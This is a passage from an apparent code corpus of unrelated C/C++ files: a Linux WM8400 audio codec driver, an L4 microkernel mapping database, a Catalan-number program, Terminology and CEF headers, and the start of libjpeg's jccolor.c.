WM8400_SOFTST | WM8400_BUFDCOPEN | WM8400_POBCTRL | WM8400_BUFIOEN); /* mute DAC */ val = snd_soc_read(codec, WM8400_DAC_CTRL); snd_soc_write(codec, WM8400_DAC_CTRL, val | WM8400_DAC_MUTE); /* Enable any disabled outputs */ val = snd_soc_read(codec, WM8400_POWER_MANAGEMENT_1); val |= WM8400_SPK_ENA | WM8400_OUT3_ENA | WM8400_OUT4_ENA | WM8400_LOUT_ENA | WM8400_ROUT_ENA; snd_soc_write(codec, WM8400_POWER_MANAGEMENT_1, val); /* Disable VMID */ val &= ~WM8400_VMID_MODE_MASK; snd_soc_write(codec, WM8400_POWER_MANAGEMENT_1, val); msleep(300); /* Enable all output discharge bits */ snd_soc_write(codec, WM8400_ANTIPOP1, WM8400_DIS_LLINE | WM8400_DIS_RLINE | WM8400_DIS_OUT3 | WM8400_DIS_OUT4 | WM8400_DIS_LOUT | WM8400_DIS_ROUT); /* Disable VREF */ val &= ~WM8400_VREF_ENA; snd_soc_write(codec, WM8400_POWER_MANAGEMENT_1, val); /* disable POBCTRL, SOFT_ST and BUFDCOPEN */ snd_soc_write(codec, WM8400_ANTIPOP2, 0x0); ret = regulator_bulk_disable(ARRAY_SIZE(power), &power[0]); if (ret != 0) return ret; break; } codec->dapm.bias_level = level; return 0; } #define WM8400_RATES SNDRV_PCM_RATE_8000_96000 #define WM8400_FORMATS (SNDRV_PCM_FMTBIT_S16_LE | SNDRV_PCM_FMTBIT_S20_3LE |\ SNDRV_PCM_FMTBIT_S24_LE) static const struct snd_soc_dai_ops wm8400_dai_ops = { .hw_params = wm8400_hw_params, .digital_mute = wm8400_mute, .set_fmt = wm8400_set_dai_fmt, .set_clkdiv = wm8400_set_dai_clkdiv, .set_sysclk = wm8400_set_dai_sysclk, .set_pll = wm8400_set_dai_pll, }; /* * The WM8400 supports 2 different and mutually exclusive DAI * configurations. * * 1. ADC/DAC on Primary Interface * 2. ADC on Primary Interface/DAC on secondary */ static struct snd_soc_dai_driver wm8400_dai = { /* ADC/DAC on primary */ .name = "wm8400-hifi", .playback = { .stream_name = "Playback", .channels_min = 1, .channels_max = 2, .rates = WM8400_RATES, .formats = WM8400_FORMATS, }, .capture = { .stream_name = "Capture", .channels_min = 1, .channels_max = 2, .rates = WM8400_RATES, .formats = WM8400_FORMATS, }, .ops = &wm8400_dai_ops, }; static int wm8400_suspend(struct snd_soc_codec *codec) { wm8400_set_bias_level(codec, SND_SOC_BIAS_OFF); return 0; } static int wm8400_resume(struct snd_soc_codec *codec) { wm8400_set_bias_level(codec, SND_SOC_BIAS_STANDBY); return 0; } static void wm8400_probe_deferred(struct work_struct *work) { struct wm8400_priv *priv = container_of(work, struct wm8400_priv, work); struct snd_soc_codec *codec = priv->codec; /* charge output caps */ wm8400_set_bias_level(codec, SND_SOC_BIAS_STANDBY); } static int wm8400_codec_probe(struct snd_soc_codec *codec) { struct wm8400 *wm8400 = dev_get_platdata(codec->dev); struct wm8400_priv *priv; int ret; u16 reg; priv = devm_kzalloc(codec->dev, sizeof(struct wm8400_priv), GFP_KERNEL); if (priv == NULL) return -ENOMEM; snd_soc_codec_set_drvdata(codec, priv); priv->wm8400 = wm8400; priv->codec = codec; ret = devm_regulator_bulk_get(wm8400->dev, ARRAY_SIZE(power), &power[0]); if (ret != 0) { dev_err(codec->dev, "Failed to get regulators: %d\n", ret); return ret; } INIT_WORK(&priv->work, wm8400_probe_deferred); wm8400_codec_reset(codec); reg = snd_soc_read(codec, WM8400_POWER_MANAGEMENT_1); snd_soc_write(codec, WM8400_POWER_MANAGEMENT_1, reg | WM8400_CODEC_ENA); /* Latch volume update bits */ reg = snd_soc_read(codec, WM8400_LEFT_LINE_INPUT_1_2_VOLUME); snd_soc_write(codec, WM8400_LEFT_LINE_INPUT_1_2_VOLUME, reg & WM8400_IPVU); reg = snd_soc_read(codec, WM8400_RIGHT_LINE_INPUT_1_2_VOLUME); snd_soc_write(codec, WM8400_RIGHT_LINE_INPUT_1_2_VOLUME, reg & WM8400_IPVU); snd_soc_write(codec, WM8400_LEFT_OUTPUT_VOLUME, 0x50 | (1<<8)); snd_soc_write(codec, WM8400_RIGHT_OUTPUT_VOLUME, 0x50 | (1<<8)); if (!schedule_work(&priv->work)) return -EINVAL; return 0; } static int wm8400_codec_remove(struct snd_soc_codec *codec) { u16 reg; reg = snd_soc_read(codec, WM8400_POWER_MANAGEMENT_1); snd_soc_write(codec, WM8400_POWER_MANAGEMENT_1, reg & (~WM8400_CODEC_ENA)); return 0; } static struct regmap *wm8400_get_regmap(struct device *dev) { struct wm8400 *wm8400 = dev_get_platdata(dev); return wm8400->regmap; } static struct snd_soc_codec_driver soc_codec_dev_wm8400 = { .probe = wm8400_codec_probe, .remove = wm8400_codec_remove, .suspend = wm8400_suspend, .resume = wm8400_resume, .get_regmap = wm8400_get_regmap, .set_bias_level = wm8400_set_bias_level, .controls = wm8400_snd_controls, .num_controls = ARRAY_SIZE(wm8400_snd_controls), .dapm_widgets = wm8400_dapm_widgets, .num_dapm_widgets = ARRAY_SIZE(wm8400_dapm_widgets), .dapm_routes = wm8400_dapm_routes, .num_dapm_routes = ARRAY_SIZE(wm8400_dapm_routes), }; static int wm8400_probe(struct platform_device *pdev) { return snd_soc_register_codec(&pdev->dev, &soc_codec_dev_wm8400, &wm8400_dai, 1); } static int wm8400_remove(struct platform_device *pdev) { snd_soc_unregister_codec(&pdev->dev); return 0; } static struct platform_driver wm8400_codec_driver = { .driver = { .name = "wm8400-codec", .owner = THIS_MODULE, }, .probe = wm8400_probe, .remove = wm8400_remove, }; module_platform_driver(wm8400_codec_driver); MODULE_DESCRIPTION("ASoC WM8400 driver"); MODULE_AUTHOR("Mark Brown"); MODULE_LICENSE("GPL"); MODULE_ALIAS("platform:wm8400-codec");
{ "language": "C" }
#ifndef RCC_AST_STRING_LITERAL_NODE_H #define RCC_AST_STRING_LITERAL_NODE_H #include <string> using std::string; #include "expression_node.h" class StringLiteralNode : public ExpressionNode { public: StringLiteralNode(string literal); const string literal() const; private: string _literal; }; #endif
{ "language": "C" }
/********************************************************************* * * Copyright (C) 2000-2006, 2010, Karlsruhe University * * File path: generic/mapping.cc * Description: Generic mapping database implementation * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * * THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. * * $Id: mapping.cc,v 1.27 2006/10/07 16:34:09 ud3 Exp $ * ********************************************************************/ #include <debug.h> #include <mapping.h> #include <linear_ptab.h> #include <sync.h> #include INC_API(tcb.h) spinlock_t mdb_lock; word_t mdb_pgshifts[] = MDB_PGSHIFTS; // The sigma0_mapnode is initialized to own the whole address space. static mapnode_t __sigma0_mapnode; mapnode_t * sigma0_mapnode; static rootnode_t * mdb_create_roots (mapnode_t::pgsize_e size) NOINLINE; static dualnode_t * mdb_create_dual (mapnode_t * map, rootnode_t * root) NOINLINE; /** * Initialize mapping database structures */ void SECTION (".init") init_mdb (void) { dualnode_t *dual; void mdb_buflist_init (void); mdb_buflist_init (); mdb_lock.lock(); // Frame table for the complete address space. dual = mdb_create_dual (NULL, mdb_create_roots (mapnode_t::size_max)); // Let sigma0 own the whole address space. sigma0_mapnode = &__sigma0_mapnode; sigma0_mapnode->set_backlink ((mapnode_t *) NULL, (pgent_t *) NULL); sigma0_mapnode->set_space ((space_t *) 0); sigma0_mapnode->set_depth (0); sigma0_mapnode->set_next (dual); pgent_t::pgsize_e i; mapnode_t::pgsize_e j; // Sanity checking of pgshift arrays. for (i = (pgent_t::pgsize_e) 0; i < pgent_t::size_max; i++) { if (! is_page_size_valid (i)) continue; for (j = (mapnode_t::pgsize_e) 0; j < mapnode_t::size_max; j++) if (hw_pgshifts[i] == mdb_pgshifts[j]) break; if (j == mapnode_t::size_max) panic ("mdb_pgshifts[] is not a superset of valid hw_pgshifts[]"); } mdb_lock.unlock(); } /* * Helper functions */ INLINE word_t mdb_arraysize (mapnode_t::pgsize_e pgsize) { return 1 << (mdb_pgshifts[pgsize+1] - mdb_pgshifts[pgsize]); } INLINE word_t mdb_get_index (mapnode_t::pgsize_e size, addr_t addr) { return ((word_t) addr >> mdb_pgshifts[size]) & (mdb_arraysize(size) - 1); } INLINE rootnode_t * mdb_index_root (mapnode_t::pgsize_e size, rootnode_t * r, addr_t addr) { return r + mdb_get_index (size, addr); } INLINE mapnode_t::pgsize_e mdb_pgsize (pgent_t::pgsize_e hw_pgsize) { mapnode_t::pgsize_e s = (mapnode_t::pgsize_e) 0; while (mdb_pgshifts[s] < hw_pgshifts[hw_pgsize]) s++; return s; } INLINE pgent_t::pgsize_e hw_pgsize (mapnode_t::pgsize_e mdb_pgsize) { pgent_t::pgsize_e s = (pgent_t::pgsize_e) 0; while (hw_pgshifts[s] < mdb_pgshifts[mdb_pgsize]) s++; return s; } static void remove_map (mapnode_t * pmap, mapnode_t * cmap) { mapnode_t * nmap = cmap->get_nextmap (); if (pmap->is_next_map ()) pmap->set_next (nmap); else { dualnode_t * dual = pmap->get_nextdual (); if (nmap) dual->map = nmap; else { // No more mappings, remove dual node pmap->set_next (dual->root); mdb_free_buffer ((addr_t) dual, sizeof (dualnode_t)); } } mdb_free_buffer ((addr_t) cmap, sizeof (mapnode_t)); if (nmap) nmap->set_backlink (pmap, nmap->get_pgent (cmap)); } static void NOINLINE remove_map (rootnode_t * proot, mapnode_t * cmap) { mapnode_t * nmap = cmap->get_nextmap (); if (proot->is_next_map ()) proot->set_ptr (nmap); else { dualnode_t * dual = proot->get_dual (); if (nmap) dual->map = nmap; else { // No more mappings, remove dual node proot->set_ptr (dual->root); mdb_free_buffer ((addr_t) dual, sizeof (dualnode_t)); } } mdb_free_buffer ((addr_t) cmap, sizeof (mapnode_t)); if (nmap) nmap->set_backlink (proot, nmap->get_pgent (cmap)); } /** * Inserts mapping into mapping database * * @param f_map node to map from * @param f_pg page table entry of source mapping * @param f_hwpgsize page size of source mapping * @param f_addr virtual address of source mapping * @param t_pg page table entry for destination mapping * @param t_hwpgsize page size of destination mapping * @param t_space space of destination mapping * @param grant grant or map * * @returns mapping node of the destination mapping */ mapnode_t * mdb_map (mapnode_t * f_map, pgent_t * f_pg, pgent_t::pgsize_e f_hwpgsize, addr_t f_addr, pgent_t * t_pg, pgent_t::pgsize_e t_hwpgsize, space_t * t_space, bool grant) { rootnode_t *root, *proot; mapnode_t *nmap; //space_t::begin_update(); mdb_lock.lock(); // Grant operations simply reuse the old mapping node if (grant) { if (f_map->is_prev_root ()) f_map->set_backlink (f_map->get_prevroot (f_pg), t_pg); else f_map->set_backlink (f_map->get_prevmap (f_pg), t_pg); f_map->set_space (t_space); mdb_lock.unlock(); //space_t::end_update(); return f_map; } // Convert to mapping database pagesizes mapnode_t::pgsize_e f_pgsize = mdb_pgsize (f_hwpgsize); mapnode_t::pgsize_e t_pgsize = mdb_pgsize (t_hwpgsize); mapnode_t * newmap = (mapnode_t *) mdb_alloc_buffer (sizeof (mapnode_t)); if (f_pgsize == t_pgsize) { // Hook new node directly below mapping node nmap = f_map->get_nextmap (); newmap->set_backlink (f_map, t_pg); newmap->set_space (t_space); newmap->set_depth (f_map->get_depth () + 1); newmap->set_next (nmap); // Fixup prev->next pointer if (f_map->is_next_root ()) f_map->set_next (mdb_create_dual (newmap, f_map->get_nextroot ())); else if (f_map->is_next_both ()) f_map->get_nextdual ()->map = newmap; else f_map->set_next (newmap); // Fixup next->prev pointer if (nmap) nmap->set_backlink (newmap, nmap->get_pgent (f_map)); mdb_lock.unlock(); //space_t::end_update(); return newmap; } root = NULL; while (f_pgsize > t_pgsize) { // Need to traverse into subtrees f_pgsize--; proot = root; if (proot) { nmap = proot->get_map (); root = proot->get_root (); } else { // This is for 1st iteration only nmap = f_map->get_nextmap (); root = f_map->get_nextroot (); } if (! root) { // New array needs to be created root = mdb_create_roots (f_pgsize); if (proot) // Insert below previous root node if (nmap) proot->set_ptr (mdb_create_dual (nmap, root)); else proot->set_ptr (root); else // Insert below original mapping node if (nmap) f_map->set_next (mdb_create_dual (nmap, root)); else f_map->set_next (root); } // Traverse into subtree root = mdb_index_root (f_pgsize, root, f_addr); } // Insert mapping below root node nmap = root->get_map (); newmap->set_backlink (root, t_pg); newmap->set_space (t_space); newmap->set_depth (f_map->get_depth () + 1); newmap->set_next (root->get_map ()); // printf ("newmap=%p prev=%p:%p space=%p depth=%p next=%p:%p:%p\n", // newmap, newmap->get_prevmap(t_pg), newmap->get_prevroot(t_pg), // newmap->get_space(), newmap->get_depth(), // newmap->get_nextmap(), newmap->get_nextroot(), // newmap->get_nextdual()); // Fixup root->next pointer if (root->is_next_root ()) root->set_ptr (mdb_create_dual (newmap, root->get_root ())); else if (root->is_next_both ()) root->get_dual ()->map = newmap; else root->set_ptr (newmap); // Fixup next->prev pointer if (nmap) nmap->set_backlink (newmap, nmap->get_pgent (root)); mdb_lock.unlock(); //space_t::end_update(); return newmap; } /** * Flush mapping recursively from mapping database * * @param f_map node to flush from * @param f_pg page table entry of source mapping * @param f_hwpgsize page size of source mapping * @param f_addr virtual address of source mapping * @param t_hwpgsize page size to flush * @param fp fpage specified to fpage_unmap() * @param unmap_self flush self or just just child mapping * * Recursively revokes access attributes of indicated mapping. If all * access rights are revoked, the mapping will be recursively removed * from the mapping database. * * @returns logical OR of all involved mappings' access attributes */ word_t mdb_flush (mapnode_t * f_map, pgent_t * f_pg, pgent_t::pgsize_e f_hwpgsize, addr_t f_addr, pgent_t::pgsize_e t_hwpgsize, fpage_t fp, bool unmap_self) { dualnode_t *dual; mapnode_t *pmap, *nmap; rootnode_t *root, *proot, *nroot; word_t rcnt, startdepth, rwx; addr_t vaddr; space_t *space, *parent_space; pgent_t *parent_pg; pgent_t::pgsize_e parent_pgsize; mapnode_t * r_nmap[mapnode_t::size_max]; rootnode_t * r_root[mapnode_t::size_max]; word_t r_rcnt[mapnode_t::size_max]; word_t r_prev[mapnode_t::size_max]; /* Bit 0 set indicates mapping. Bit 0 cleared indicates root. */ rcnt = 0; startdepth = f_map->get_depth (); root = NULL; if (unmap_self) { // Read and reset the reference bits stored in the mapping node. // These reference bits were updated when someone further up in // the mappings tree performed an reference bit read-and-reset // (i.e., unmap). Also clear the reference bits in the page table // entry to make sure that the mapping node bits are not modified // in the algortihm below. space = f_map->get_space (); vaddr = f_pg->vaddr (space, f_hwpgsize, f_map); rwx = f_map->get_rwx () | f_pg->reference_bits (space, f_hwpgsize, vaddr); f_map->set_rwx (0); f_pg->reset_reference_bits (space, f_hwpgsize); parent_pg = NULL; } else { // Do not take the reference bits of current mapping into // account unless we have a flush operation. Instead, we // record the reference bits for the whole subtree in the // current page table entry. rwx = 0; parent_pg = f_pg; parent_space = f_map->get_space (); parent_pgsize = f_hwpgsize; } // Convert to mapping database pagesizes mapnode_t::pgsize_e f_pgsize = mdb_pgsize (f_hwpgsize); mapnode_t::pgsize_e t_pgsize = mdb_pgsize (t_hwpgsize); mdb_lock.lock(); do { // Variables `f_map' and `f_pg' are valid at this point dual = f_map->get_nextdual (); nroot = f_map->get_nextroot (); nmap = f_map->get_nextmap (); pmap = f_map->get_prevmap (f_pg); proot = f_map->get_prevroot (f_pg); space = f_map->get_space (); f_hwpgsize = hw_pgsize (f_pgsize); // Variable contents at this point: // // f_map - the current mapping node // f_pg - the current pgent node // pmap - the previous mapping node (or NULL if prev is root) // proot - the previous root node (or NULL if prev is map) // nmap - the next mapping node (may be NULL) // dual - next dual node (or NULL if no such node) // root - Current root array pointer (or NULL) // printf("New: f_map=%p dual=%p nmap=%p pmap=%p proot=%p " // "fsize=%d tsize=%d root=%p\n", // f_map, dual, nmap, pmap, proot, f_pgsize, t_pgsize, root); vaddr = f_pg->vaddr (space, f_hwpgsize, f_map); if (unmap_self) { // Update reference bits f_map->update_rwx (f_pg->reference_bits (space, f_hwpgsize, vaddr)); rwx |= f_pg->reference_bits (space, f_hwpgsize, vaddr); ASSERT (f_pgsize <= t_pgsize); if (fp.is_rwx ()) { // Revoke all access rights (i.e., remove node) if (pmap) remove_map (pmap, f_map); else remove_map (proot, f_map); f_pg->clear(space, f_hwpgsize, false, vaddr); } else { // Revoke access rights f_pg->revoke_rights (space, f_hwpgsize, fp.get_rwx ()); f_pg->reset_reference_bits (space, f_hwpgsize); f_pg->flush (space, f_hwpgsize, false, vaddr); pmap = f_map; proot = NULL; } // We might have to flush some TLB entries if (! space->does_tlbflush_pay (fp.get_size_log2 ())) space->flush_tlbent (get_current_space (), vaddr, page_shift (f_hwpgsize)); } else { f_pg->reset_reference_bits (space, f_hwpgsize); pmap = f_map; proot = NULL; } f_map = NULL; // Variables `f_map' and `f_pg' are no longer valid here if (nroot) { f_pgsize--; if (f_pgsize < t_pgsize) { // Recurse into subarray before checking mappings ASSERT (f_pgsize < mapnode_t::size_max); r_prev[f_pgsize] = pmap ? (word_t) pmap | 1 : (word_t) proot; r_nmap[f_pgsize] = nmap; r_root[f_pgsize] = root; r_rcnt[f_pgsize] = rcnt; root = nroot - 1; rcnt = mdb_arraysize (f_pgsize); if (dual && fp.is_rwx () && unmap_self) mdb_free_buffer ((addr_t) dual, sizeof (dualnode_t)); } else { // We may use the virtual address f_addr for indexing // here since the alignment within the page will be // the same as with the physical address. root = mdb_index_root (f_pgsize, nroot, f_addr) - 1; rcnt = 1; } } else { if (nmap) { if (pmap) f_pg = nmap->get_pgent (pmap); else f_pg = nmap->get_pgent (proot); f_map = nmap; } else if ((f_pgsize < t_pgsize) && root) { // Recurse up from subarray if (fp.is_rwx ()) { // Revoke all access rights (i.e., remove subtree) root -= mdb_arraysize (f_pgsize) - 1; mdb_free_buffer ((addr_t) root, mdb_arraysize (f_pgsize) * sizeof (rootnode_t)); } ASSERT (f_pgsize < mapnode_t::size_max); f_map = r_nmap[f_pgsize]; root = r_root[f_pgsize]; rcnt = r_rcnt[f_pgsize]; if (r_prev[f_pgsize] & 1) { proot = NULL; pmap = (mapnode_t *) (r_prev[f_pgsize] & ~1UL); if (f_map) f_pg = f_map->get_pgent (pmap); } else { proot = (rootnode_t *) r_prev[f_pgsize]; pmap = NULL; if (f_map) f_pg = f_map->get_pgent (proot); } f_pgsize++; } } // If f_map now is non-nil, the variables f_map, f_pg, pmap // and proot will all be valid. Otherwise, root and rcnt will // be valid. while ((! f_map) && (rcnt > 0)) { rcnt--; root++; dual = root->get_dual (); nroot = root->get_root (); f_map = root->get_map (); if (nroot) { // Recurse into subarray before checking mappings f_pgsize--; if (fp.is_rwx ()) root->set_ptr (f_map); // Remove subarray ASSERT (f_pgsize < mapnode_t::size_max); r_prev[f_pgsize] = (word_t) root; r_nmap[f_pgsize] = f_map; r_root[f_pgsize] = root; r_rcnt[f_pgsize] = rcnt; f_map = NULL; root = nroot - 1; rcnt = mdb_arraysize (f_pgsize); if (dual && fp.is_rwx ()) mdb_free_buffer ((addr_t) dual, sizeof (dualnode_t)); } else { if (f_map) { f_pg = f_map->get_pgent (root); pmap = NULL; proot = root; } } } if (f_pgsize <= t_pgsize) // From now on we will unmap all nodes unmap_self = true; } while (f_map && f_map->get_depth () > startdepth); // Update the reference bits in the page table entry of the parent // mapping. // XXX: Handle the case where one does flush instead of unmap. if (parent_pg) parent_pg->update_reference_bits (parent_space, parent_pgsize, rwx); mdb_lock.unlock(); return rwx; } /** * Create root array * * @param size page size for root nodes * * Allocates and initializes a new root array. * * @returns pointer to array */ static NOINLINE rootnode_t * mdb_create_roots (mapnode_t::pgsize_e size) { rootnode_t *newnodes, *n; word_t num = mdb_arraysize (size); newnodes = (rootnode_t *) mdb_alloc_buffer (sizeof (rootnode_t) * num); for (n = newnodes; num--; n++) n->set_ptr ((mapnode_t *) NULL); return newnodes; } /** * Create a dual node * * @param map map pointer of node * @param root root pointer of node * * Allocates and initializes a new dual node. * * @returns pointer to dual node */ static NOINLINE dualnode_t * mdb_create_dual (mapnode_t * map, rootnode_t * root) { dualnode_t * dual = (dualnode_t *) mdb_alloc_buffer (sizeof (dualnode_t)); dual->map = map; dual->root = root; return dual; }
{ "language": "C" }
/* Catalan numbers (Cn) are a sequence of natural numbers that occur in many places. The most important ones being that Cn gives the number of Binary Search Trees possible with n values. Cn is the number of full Binary Trees with n + 1 leaves. Cn is the number of different ways n + 1 factors can be completely parenthesized. */ #include<stdio.h> #include<string.h> typedef long long int ll; int main() { // n denotes the nth Catalan Number that we want to compute ll n; scanf("%lld", &n); // Catalan array stores the catalan numbers from 1....n ll Catalan[n + 1]; memset(Catalan, 0, sizeof(Catalan)); // The first two values are 1 for this series Catalan[0] = 1, Catalan[1] = 1; /* For e.g if n = 5, then Cn = (Catalan(0) * Catalan(4)) + (Catalan(1) * Catalan(3)) + (Catalan(2) * Catalan(2)) + (Catalan(3) * Catalan(1)) + (Catalan(4)* Catalan(0)) We can see here that Catalan numbers form a recursive relation i.e for nth term, the Catalan number Cn is the sum of Catalan(i) * Catalan(n-i-1) where i goes from 0...n-1. We can also observe that several values are getting repeated and hence we optimise the performance by applying memoization. */ for (int i = 2; i <= n; i++) { for (int j = 0; j < i; j++) Catalan[i] += (Catalan[j] * Catalan[i - j - 1]); } // nth Catalan number is given by n - 1th index printf("The Catalan Number (Cn) is: %lld", Catalan[n - 1]); return 0; } /* Input: 10 Output: The Catalan Number (Cn) is: 4862 Input: 5 Output: The Catalan Number (Cn) is: 14 */
{ "language": "C" }
#ifndef _TERMIOINTERNALS_H__ #define _TERMIOINTERNALS_H__ 1 #if defined(BINARY_TYFUZZ) || defined(BINARY_TYTEST) typedef void Term; #endif typedef struct _Termio Termio; struct _Termio { Evas_Object_Smart_Clipped_Data __clipped_data; struct { const char *name; int size; int chw, chh; } font; struct { int w, h; Evas_Object *obj; } grid; struct { Evas_Object *top, *bottom, *theme; } sel; struct { Evas_Object *obj; int x, y; Cursor_Shape shape; } cursor; struct { int cx, cy; int button; } mouse; struct { const char *string; int x1, y1, x2, y2; Eina_Bool is_color; int suspend; uint16_t id; Eina_List *objs; struct { uint8_t r; uint8_t g; uint8_t b; uint8_t a; } color; struct { Evas_Object *dndobj; Evas_Coord x, y; unsigned char down : 1; unsigned char dnd : 1; unsigned char dndobjdel : 1; } down; } link; struct { const char *file; FILE *f; double progress; unsigned long long total, size; Eina_Bool active : 1; } sendfile; struct { int r; int g; int b; int a; } saved_bg, saved_fg; Evas_Object *ctxpopup; int zoom_fontsize_start; int scroll; Evas_Object *self; Evas_Object *event; Term *term; Termpty *pty; Ecore_Animator *anim; Ecore_Timer *delayed_size_timer; Ecore_Timer *link_do_timer; Ecore_Timer *mouse_selection_scroll_timer; Ecore_Job *mouse_move_job; Ecore_Timer *mouseover_delay; Evas_Object *win, *theme, *glayer; Config *config; const char *sel_str; Eina_List *cur_chids; Ecore_Job *sel_reset_job; double set_sel_at; Elm_Sel_Type sel_type; unsigned char jump_on_change : 1; unsigned char jump_on_keypress : 1; unsigned char have_sel : 1; unsigned char noreqsize : 1; unsigned char didclick : 1; unsigned char moved : 1; unsigned char bottom_right : 1; unsigned char top_left : 1; unsigned char reset_sel : 1; unsigned char cb_added : 1; double gesture_zoom_start_size; }; typedef struct _Termio_Modifiers Termio_Modifiers; struct _Termio_Modifiers { unsigned char alt : 1; unsigned char shift : 1; unsigned char ctrl : 1; unsigned char super : 1; unsigned char meta : 1; unsigned char hyper : 1; unsigned char iso_level3_shift : 1; unsigned char altgr : 1; }; #define INT_SWAP(_a, _b) do { \ int _swap = _a; _a = _b; _b = _swap; \ } while (0) void termio_internal_mouse_down(Termio *sd, Evas_Event_Mouse_Down *ev, Termio_Modifiers modifiers); void termio_internal_mouse_up(Termio *sd, Evas_Event_Mouse_Up *ev, Termio_Modifiers modifiers); void termio_internal_mouse_move(Termio *sd, Evas_Event_Mouse_Move *ev, Termio_Modifiers modifiers); void termio_internal_mouse_wheel(Termio *sd, Evas_Event_Mouse_Wheel *ev, Termio_Modifiers modifiers); void termio_selection_dbl_fix(Termio *sd); void termio_selection_get(Termio *sd, int c1x, int c1y, int c2x, int c2y, struct ty_sb *sb, Eina_Bool rtrim); void termio_scroll(Evas_Object *obj, int direction, int start_y, int end_y); void termio_cursor_to_xy(Termio *sd, Evas_Coord x, Evas_Coord y, int *cx, int *cy); void termio_internal_render(Termio *sd, Evas_Coord ox, Evas_Coord oy, int *preedit_xp, int *preedit_yp); const char * termio_internal_get_selection(Termio *sd, size_t *lenp); #endif
{ "language": "C" }
// Copyright (c) 2016 The Chromium Embedded Framework Authors. All rights // reserved. Use of this source code is governed by a BSD-style license that // can be found in the LICENSE file. // // --------------------------------------------------------------------------- // // This file was generated by the CEF translator tool. If making changes by // hand only do so within the body of existing method and function // implementations. See the translator.README.txt file in the tools directory // for more information. // #ifndef CEF_LIBCEF_DLL_CPPTOC_REQUEST_CONTEXT_HANDLER_CPPTOC_H_ #define CEF_LIBCEF_DLL_CPPTOC_REQUEST_CONTEXT_HANDLER_CPPTOC_H_ #pragma once #ifndef USING_CEF_SHARED #pragma message("Warning: "__FILE__" may be accessed wrapper-side only") #else // USING_CEF_SHARED #include "include/cef_request_context_handler.h" #include "include/capi/cef_request_context_handler_capi.h" #include "libcef_dll/cpptoc/cpptoc.h" // Wrap a C++ class with a C structure. // This class may be instantiated and accessed wrapper-side only. class CefRequestContextHandlerCppToC : public CefCppToC<CefRequestContextHandlerCppToC, CefRequestContextHandler, cef_request_context_handler_t> { public: CefRequestContextHandlerCppToC(); }; #endif // USING_CEF_SHARED #endif // CEF_LIBCEF_DLL_CPPTOC_REQUEST_CONTEXT_HANDLER_CPPTOC_H_
{ "language": "C" }
/* * jccolor.c * * Copyright (C) 1991-1996, Thomas G. Lane. * Modified 2011-2013 by Guido Vollbeding. * This file is part of the Independent JPEG Group's software. * For conditions of distribution and use, see the accompanying README file. * * This file contains input colorspace conversion routines. */ #define JPEG_INTERNALS #include "jinclude.h" #include "jpeglib.h" /* Private subobject */ typedef struct { struct jpeg_color_converter pub; /* public fields */ /* Private state for RGB->YCC conversion */ INT32 * rgb_ycc_tab; /* => table for RGB to YCbCr conversion */ } my_color_converter; typedef my_color_converter * my_cconvert_ptr; /**************** RGB -> YCbCr conversion: most common case **************/ /* * YCbCr is defined per Recommendation ITU-R BT.601-7 (03/2011), * previously known as Recommendation CCIR 601-1, except that Cb and Cr * are normalized to the range 0..MAXJSAMPLE rather than -0.5 .. 0.5. * sRGB (standard RGB color space) is defined per IEC 61966-2-1:1999. * sYCC (standard luma-chroma-chroma color space with extended gamut) * is defined per IEC 61966-2-1:1999 Amendment A1:2003 Annex F. * bg-sRGB and bg-sYCC (big gamut standard color spaces) * are defined per IEC 61966-2-1:1999 Amendment A1:2003 Annex G. * Note that the derived conversion coefficients given in some of these * documents are imprecise. The general conversion equations are * Y = Kr * R + (1 - Kr - Kb) * G + Kb * B * Cb = 0.5 * (B - Y) / (1 - Kb) * Cr = 0.5 * (R - Y) / (1 - Kr) * With Kr = 0.299 and Kb = 0.114 (derived according to SMPTE RP 177-1993 * from the 1953 FCC NTSC primaries and CIE Illuminant C), * the conversion equations to be implemented are therefore * Y = 0.299 * R + 0.587 * G + 0.114 * B * Cb = -0.168735892 * R - 0.331264108 * G + 0.5 * B + CENTERJSAMPLE * Cr = 0.5 * R - 0.418687589 * G - 0.081312411 * B + CENTERJSAMPLE * Note: older versions of the IJG code used a zero offset of MAXJSAMPLE/2, * rather than CENTERJSAMPLE, for Cb and Cr. This gave equal positive and * negative swings for Cb/Cr, but meant that grayscale values (Cb=Cr=0) * were not represented exactly. Now we sacrifice exact representation of * maximum red and maximum blue in order to get exact grayscales. * * To avoid floating-point arithmetic, we represent the fractional constants * as integers scaled up by 2^16 (about 4 digits precision); we have to divide * the products by 2^16, with appropriate rounding, to get the correct answer. * * For even more speed, we avoid doing any multiplications in the inner loop * by precalculating the constants times R,G,B for all possible values. * For 8-bit JSAMPLEs this is very reasonable (only 256 entries per table); * for 9-bit to 12-bit samples it is still acceptable. It's not very * reasonable for 16-bit samples, but if you want lossless storage you * shouldn't be changing colorspace anyway. * The CENTERJSAMPLE offsets and the rounding fudge-factor of 0.5 are included * in the tables to save adding them separately in the inner loop. */ #define SCALEBITS 16 /* speediest right-shift on some machines */ #define CBCR_OFFSET ((INT32) CENTERJSAMPLE << SCALEBITS) #define ONE_HALF ((INT32) 1 << (SCALEBITS-1)) #define FIX(x) ((INT32) ((x) * (1L<<SCALEBITS) + 0.5)) /* We allocate one big table and divide it up into eight parts, instead of * doing eight alloc_small requests. This lets us use a single table base * address, which can be held in a register in the inner loops on many * machines (more than can hold all eight addresses, anyway). */ #define R_Y_OFF 0 /* 